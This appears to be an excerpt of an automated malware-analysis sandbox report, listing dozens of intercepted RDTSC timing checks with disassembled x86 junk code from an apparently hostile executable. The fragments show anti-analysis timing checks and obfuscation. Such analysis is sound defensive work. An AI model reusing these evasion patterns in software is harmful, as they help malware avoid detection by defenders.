Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 121A2C7 second address: 121A2F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jns 00007F5C20C5AC3Ah 0x0000000f jmp 00007F5C20C5AC42h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 121A2F0 second address: 121A2F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 121A2F4 second address: 121A2FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 121A6EC second address: 121A70B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5C21209558h 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 121A70B second address: 121A739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d pushad 0x0000000e jmp 00007F5C20C5AC49h 0x00000013 jno 00007F5C20C5AC36h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 121CE55 second address: 121CE68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5C2120954Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 121C945 second address: 121C961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5C20C5AC47h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1220B9A second address: 1220B9F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1220B9F second address: 1220BA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1220F8E second address: 1220F94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1220F94 second address: 1220FC8 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5C20C5AC36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F5C20C5AC3Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F5C20C5AC36h 0x00000017 jmp 00007F5C20C5AC44h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12212D4 second address: 12212D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12264E2 second address: 12264FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F5C20C5AC36h 0x0000000a jmp 00007F5C20C5AC3Eh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1226651 second address: 1226655 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1226655 second address: 122668F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F5C20C5AC36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f jmp 00007F5C20C5AC3Ah 0x00000014 pushad 0x00000015 popad 0x00000016 pop eax 0x00000017 pushad 0x00000018 jng 00007F5C20C5AC36h 0x0000001e jng 00007F5C20C5AC36h 0x00000024 jmp 00007F5C20C5AC3Eh 0x00000029 pushad 0x0000002a popad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12267ED second address: 1226803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007F5C21209546h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1226803 second address: 1226811 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11CE216 second address: 11CE2D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 jmp 00007F5C21209557h 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007F5C21209556h 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F5C21209548h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 00000019h 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 jo 00007F5C21209549h 0x00000036 and ch, 0000007Ah 0x00000039 mov ebx, dword ptr [ebp+12483379h] 0x0000003f jnc 00007F5C2120954Ch 0x00000045 add eax, ebx 0x00000047 push 00000000h 0x00000049 push eax 0x0000004a call 00007F5C21209548h 0x0000004f pop eax 0x00000050 mov dword ptr [esp+04h], eax 0x00000054 add dword ptr [esp+04h], 0000001Ah 0x0000005c inc eax 0x0000005d push eax 0x0000005e ret 0x0000005f pop eax 0x00000060 ret 0x00000061 xor dword ptr [ebp+122D1CE9h], edi 0x00000067 nop 0x00000068 jg 00007F5C21209558h 0x0000006e push eax 0x0000006f push eax 0x00000070 jbe 00007F5C2120954Ch 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1227953 second address: 1227957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 122A9EC second address: 122A9FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007F5C21209548h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 122A9FC second address: 122AA13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5C20C5AC43h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 122A4CB second address: 122A4D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1232000 second address: 1232004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1230182 second address: 1230186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1230186 second address: 12301A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jmp 00007F5C20C5AC41h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1230470 second address: 123049D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007F5C21209546h 0x0000000b pop edx 0x0000000c jng 00007F5C2120955Ah 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 123049D second address: 12304C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 pushad 0x00000008 je 00007F5C20C5AC36h 0x0000000e jmp 00007F5C20C5AC44h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 123138B second address: 1231391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1231391 second address: 1231396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1231396 second address: 12313A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F5C2120954Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12313A7 second address: 12313B6 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5C20C5AC36h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 123169B second address: 123169F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12382A1 second address: 12382A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12382A5 second address: 12382AB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12375A6 second address: 12375AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12376DB second address: 12376E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1237C61 second address: 1237C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 jnc 00007F5C20C5AC36h 0x0000000c pop ebx 0x0000000d pop edi 0x0000000e pushad 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1237DDE second address: 1237DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1237DE2 second address: 1237DE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1237F68 second address: 1237F85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5C21209559h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1237F85 second address: 1237F89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 123CBC7 second address: 123CBCD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1242B64 second address: 1242B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1242CAF second address: 1242CCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5C21209556h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1242CCB second address: 1242CCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1243C8A second address: 1243CB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5C21209550h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F5C2120954Eh 0x00000011 pushad 0x00000012 popad 0x00000013 jng 00007F5C21209546h 0x00000019 pushad 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c jns 00007F5C21209546h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1243CB9 second address: 1243CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1243CBE second address: 1243CCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F5C21209546h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 124CE8B second address: 124CE9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jns 00007F5C20C5AC36h 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F5C20C5AC36h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 124C8CE second address: 124C8E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F5C21209546h 0x0000000a je 00007F5C21209546h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 124C8E3 second address: 124C8E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 124C8E7 second address: 124C8EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 124C8EF second address: 124C928 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5C20C5AC3Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e jng 00007F5C20C5AC36h 0x00000014 pop esi 0x00000015 push edi 0x00000016 jbe 00007F5C20C5AC36h 0x0000001c jmp 00007F5C20C5AC45h 0x00000021 pop edi 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 124C928 second address: 124C932 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F5C21209546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 124C932 second address: 124C93C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 124C93C second address: 124C942 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1258C45 second address: 1258C4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 125CFC6 second address: 125CFE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5C21209552h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 125CFE6 second address: 125CFEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 125CBE1 second address: 125CBE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 125FA47 second address: 125FA53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5C20C5AC36h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1186253 second address: 118626C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5C21209553h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 118626C second address: 118627F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F5C20C5AC36h 0x0000000d je 00007F5C20C5AC36h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 118627F second address: 118629A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e js 00007F5C21209546h 0x00000014 jnl 00007F5C21209546h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 125F579 second address: 125F57E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 126118B second address: 126118F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 126F5FF second address: 126F618 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5C20C5AC38h 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007F5C20C5AC3Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 126F49F second address: 126F4A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 126F4A5 second address: 126F4A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1270C54 second address: 1270C5A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1276B0F second address: 1276B13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1276B13 second address: 1276B5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5C21209546h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007F5C21209558h 0x00000013 pushad 0x00000014 jmp 00007F5C21209558h 0x00000019 jl 00007F5C21209546h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1276B5A second address: 1276B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push edx 0x00000009 pop edx 0x0000000a jc 00007F5C20C5AC36h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1276B6C second address: 1276B75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1276B75 second address: 1276B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1276CEF second address: 1276D26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5C21209552h 0x00000007 jmp 00007F5C21209557h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 popad 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12770D5 second address: 12770D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 127723B second address: 1277251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5C2120954Dh 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1277251 second address: 1277255 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12773B2 second address: 12773B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12773B8 second address: 12773D7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jbe 00007F5C20C5AC36h 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5C20C5AC41h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1277536 second address: 127753A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 127C994 second address: 127C99A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1294B4A second address: 1294B50 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1294B50 second address: 1294B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F5C20C5AC36h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1294B5E second address: 1294B64 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1294B64 second address: 1294B71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1294B71 second address: 1294B77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1294B77 second address: 1294B97 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5C20C5AC36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007F5C20C5AC46h 0x00000010 jmp 00007F5C20C5AC40h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1294B97 second address: 1294B9E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1294B9E second address: 1294BAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jc 00007F5C20C5AC36h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12973D4 second address: 12973F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5C21209558h 0x00000009 popad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12973F4 second address: 1297403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007F5C20C5AC36h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1297403 second address: 1297407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1297407 second address: 129740B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
